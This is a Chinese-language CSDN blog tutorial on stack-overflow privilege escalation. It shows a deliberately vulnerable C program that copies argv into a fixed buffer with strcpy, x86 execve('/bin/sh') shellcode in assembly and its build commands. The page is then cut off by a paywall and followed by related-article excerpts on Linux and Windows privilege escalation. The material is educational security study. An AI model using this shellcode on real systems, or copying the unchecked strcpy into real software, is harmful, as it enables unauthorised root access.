栈溢出攻击提权进入root shell

最新推荐文章于 2024-05-28 15:45:10 发布
最新推荐文章于 2024-05-28 15:45:10 发布
阅读量4.3k 收藏 1
点赞数 1
分类专栏: shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyx2007825/article/details/40983809
版权
本文详细介绍了如何通过栈溢出攻击来获取root shell的步骤。首先,编写了一个简单的bug.c程序,然后利用shellcode避开00字节限制。接着,通过编写exploit.c进行栈溢出攻击,但在实际操作中遇到栈地址随机化和栈不可执行的保护机制。为了解决这些问题,关闭了这些保护,并用zsh替代bash,最终成功进入root shell。若不关闭栈地址随机化,文章也提供了一种可能的解决思路。
摘要由CSDN通过智能技术生成

以前对栈溢出攻击只是一种感官上的,最近学了shellcode,才真切地感觉到了栈溢出攻击有多么危险。

为了测试简单,写一个比较简单的程序,我们称之为bug.c


#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
	char buff[500];
	strcpy(buff,argv[1]);
	return 0;
}

这段代码比较简单,就是为了用来测试栈溢出的,很显然,它是有漏洞的。

好了,我们准备好进入root shell的汇编代码:

Section .text
global _start

_start:
	xor eax,eax
	push eax
	push 0x68732f	; /sh 小端机存储
	push 0x6e69622f ; /bin 小端存储
	mov ebx,esp
	push eax
	push ebx
	mov ecx,esp
	xor edx,edx
	mov al,0xb	; execve函数
	int 0x80

我们用nasm编译: 

nasm -f elf execve.asm

用ld链接:

ld execve -o execve.o

我们测试一下结果:

最低0.47元/天 解锁文章
痕枫冷
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
常见windwos提权笔记
03-30
- **提权root用户**: 类似于Windows中的提权概念,在Linux系统中则是将普通用户提升至拥有最高权限的root用户。 #### 五、常见提权环境介绍 ##### 5.1 Webshell - **定义**: Webshell是通过Web应用漏洞上传到...
linux环境weblogic栈溢出,栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(...
weixin_30245667的博客
05-16 210
栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(一)函数如何执行栈溢出网上已经有很多的例子了,但是很少会涉及到在64位的和操作系统linux相关的,而最近刚好在一直研究这个,所以写着一系列博文,一来是为了帮助自己记忆,二来也是为了更多的大家互相探讨。寄存器X86-64有16个64位寄存器,分别是:%rax,%rbx,%rcx,%rdx,%esi,%edi,%rb...
windows内核提权(一)之栈溢出
qq_41252520的博客
04-24 828
前言 这个学期在做一个安全软件项目,涉及到windows的驱动开发,也因此项目为我敲开了windows内核的大门。这里面的东西奥妙无穷,亟待探索。 环境 HackSystem的作者专门为教学windows内核安全而写了一个漏洞驱动HEVD,里面包含了基本的堆栈溢出漏洞,并附带了EXP。我下载的是最新版的HEVD3.0。 windows7 32位 分析 首先使用IDA静态分析一下,找到D...
简谈SUID提权
最新发布
2401_84466336的博客
05-28 1014
​ SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls。
Linux 提权的各种姿势总结
weixin_45116657的博客
11-21 5043
友情链接:Linux 提权的各种姿势总结 目录 提权方式总结 1、利用内核栈溢出提权 1.1> 信息收集 1.2> linux-exploit-suggester-2 2、明文 root 密码提权 3、密码复用 4、sudo 滥用 (1)su (2)awk (3)man (4)curl 5、su root 被禁止解决 6、计划任务 (1)重写pyth...
栈溢出问题(Stack overflow)【转载】
yangbing1113的专栏
09-25 1220
通过栈溢出来获得root权限是目前使用的相当普遍的一项黑客技术。事实上这是一个黑客在系统 本地已经拥有了一个基本账号后的首选攻击方式。他也被广泛应用于远程攻击。通过对daemon进程 的栈溢出来实现远程获得rootshell的技术,已经被很多实例实现。 在windows系统中,同样存在着栈溢出的问题。而且,随着internet的普及,win系列平台上 的 internet服
linux缓冲区溢出漏洞攻击文件
10-29
5. **shellcode**:在Linux环境中,攻击者通常会插入shellcode,这是一个小型的机器码程序,会在控制权转移后执行,创建一个shell,给予攻击者命令行接口,从而能执行任意系统命令。 为了防止缓冲区溢出攻击,Linux...
red hat5提权
04-10
在IT安全领域,"提权"是指通过某种方式获取系统中更高的权限,通常是指从一个普通用户权限提升到管理员或root权限。对于Red Hat 5这样的Linux发行版来说,提权是一个重要的议题,因为系统安全往往依赖于权限管理。在...
缓冲区溢出漏洞实验报告
10-15
当stack程序执行到溢出点时,返回地址将被修改,控制权转交给shellcode,最终使攻击者获得root权限。 实验过程中,我们还提到了使用不同shell程序(如zsh)的重要性,这是因为在某些情况下,shell程序会自动放弃其...
Linux下WEBSHELL提权一技
06-15
Linux下WEBSHELL提权一技 用phpshell2.0和配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
linux x64 shellcode,栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(二)shellcode...
weixin_42386033的博客
05-12 518
shellcode 是一组指令opcode, 是可以被程序运行,因为shellcode是要直接操作寄存器和函数,所以opcode 必须是十六进制的形式。既然是攻击,那shellcode 主要的目的是调用系统函数,而在x86下 在linux下有两种方式。第一种是通过直接调用中断 int 0x80进入内核态,从而达到调用目的。第二种是通过调用libc里syscall(64位)和sysenter(32位...
linux 25端口漏洞,Linux通过栈溢出进行提权实战(dpwwn03)
weixin_39953740的博客
05-07 2020
最近在刷vulnhub靶场,偶然间做到了dpwwn系列的靶场,其中dpwwn03靶场提权用的是程序栈溢出的漏洞,相对常规方法还是比较少见的,所以拿出来单独在这里研究下。既然讲到了提权,顺带介绍下常规的提权方式:1、内核漏洞例如脏牛这类型的。2、定时任务Cron通常以root特权运行。如果我们可以成功修改cron中的任何脚本或二进制文件,那么我们可以使用root权限执行任意代码。3、suid提权SU...
黑客零基础第三章-Web漏洞实战-文件上传DC5
ShadowBlade
08-24 1848
第五节内容讲述了文件包含漏洞LIF的利用原理,并在DVWA上进行了日志投毒结合LFI入侵的实验。本节以实战的方式,结合vulnhub靶机DC5让大家进一步熟练LFI结合日志投毒的实际应用。 如果靶机部署有疑问,请留言!
栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(二)shellcode
沧海一粟
02-23 9514
栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(二)shellcode
DC-5靶机渗透测试
读书 买花 长大
03-14 1506
DC-5
CTF训练笔记(五)- 一些获取FLAG的方法总结(待续)
热门推荐
morrino的博客
04-21 2万+
- 注意开放了未知服务的端口,可以使用nc工具获取对应的Banner信息; - 当命令疑似被过滤时,尝试使用相近的shell命令绕开过滤,如‘cat’换成‘more’; - 不放过任何可利用服务和细节,哪怕可能会做无用功; [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
【漏洞复现】 Sudo缓存溢出提权漏洞(CVE-2021-3156)
qq_50854662的博客
02-14 570
【漏洞复现】 Sudo缓存溢出提权漏洞(CVE-2021-3156)
LINUX 普通用户提权ROOT (完整版)SHELL版首发!!!
一步一个脚印
10-12 1万+
1. 在LINUX目录下建立test 帐户2.下载 a脚本 在http://milw0rm.com/exploits/84783.查看UDEV的PID  方法一: 先cat /proc/net/netlink ffff810077587400 15  364    ffffffff 0        0        0000000000000000 2ffff810037
SQLmap使用指南:数据库提权与Webshell获取
例如,使用`-d "mysql://root:123456@192.168.1.120:3306/test" --os-shell`可以直接进入操作系统shell,有时甚至获得系统权限。 4. UDF(User Defined Function)提权 在MySQL的sql-shell下,UDF可以被用来提升...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值